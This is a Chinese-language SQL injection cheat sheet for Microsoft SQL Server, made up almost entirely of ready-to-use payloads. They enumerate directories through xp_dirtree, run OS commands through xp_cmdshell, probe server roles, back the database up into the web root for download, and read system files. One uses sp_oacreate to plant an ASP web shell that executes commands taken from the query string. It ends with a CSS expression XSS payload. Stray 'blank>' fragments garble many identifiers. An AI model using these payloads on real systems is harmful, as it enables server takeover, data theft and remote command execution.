遍历目录的方法: 先创建一个临时表:temp ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ;insert temp exec master.dbo.xp_blank>_availablemedia;-- 获得当前所有驱动器 ;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:\;-- 获得子目录列表 ;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中 ;insert into temp(id) exec master.dbo.xp_blank>_cmdshell type c:\web\index.asp;-- 查看某个文件的内容 ;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\;-- ;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\ *.asp /s/a;-- ;insert into temp(id) exec master.dbo.xp_blank>_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc ;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;-- (xp_blank>_dirtree适用权限PUBLIC) 写入表: 语句1:and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin));-- 语句2:and 1=(SELECT IS_blank>_SRVROLEMEMBER(serveradmin));-- 语句3:and 1=(SELECT IS_blank>_SRVROLEMEMBER(setupadmin));-- 语句4:and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));-- 语句5:and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));-- 语句6:and 1=(SELECT IS_blank>_SRVROLEMEMBER(diskadmin));-- 语句7:and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));-- 语句8:and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));-- 语句9:and 1=(SELECT IS_blank>_MEMBER(db_blank>_owner));--
把路径写到表中去: ;create table dirs(paths varchar(100), id int)-- ;insert dirs exec master.dbo.xp_blank>_dirtree c:\-- and 0<>(select top 1 paths from dirs)-- and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- ;create table dirs1(paths varchar(100), id int)-- ;insert dirs exec master.dbo.xp_blank>_dirtree e:\web-- and 0<>(select top 1 paths from dirs1)--
把_blank>数据库备份到网页目录:下载 ;declare @a sysname; set @a=db_blank>_name();backup database @a to disk=e:\web\down.bak;--
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 参看相关表。 and 1=(select user_blank>_id from USER_blank>_LOGIN) and 0=(select user from USER_blank>_LOGIN where user>1)
-=- wscript.shell example -=- declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe ; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe--
declare @o int, @f int, @t int, @ret int declare @line varchar(8000) exec sp_blank>_oacreate scripting.filesystemobject, @o out exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 exec @ret = sp_blank>_oamethod @f, readline, @line out while( @ret = 0 ) begin print @line exec @ret = sp_blank>_oamethod @f, readline, @line out end
declare @o int, @f int, @t int, @ret int exec sp_blank>_oacreate scripting.filesystemobject, @o out exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 exec @ret = sp_blank>_oamethod @f, writeline, NULL, <% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 waitfor delay 00:00:05
; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
xp_blank>_dirtree适用权限PUBLIC exec master.dbo.xp_blank>_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。 create table dirs(paths varchar(100), id int) 建表,这里建的表是和上面xp_blank>_dirtree相关连,字段相等、类型相同。 insert dirs exec master.dbo.xp_blank>_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息 unicode <div style="{left:expRessioN (alert('xss'))}"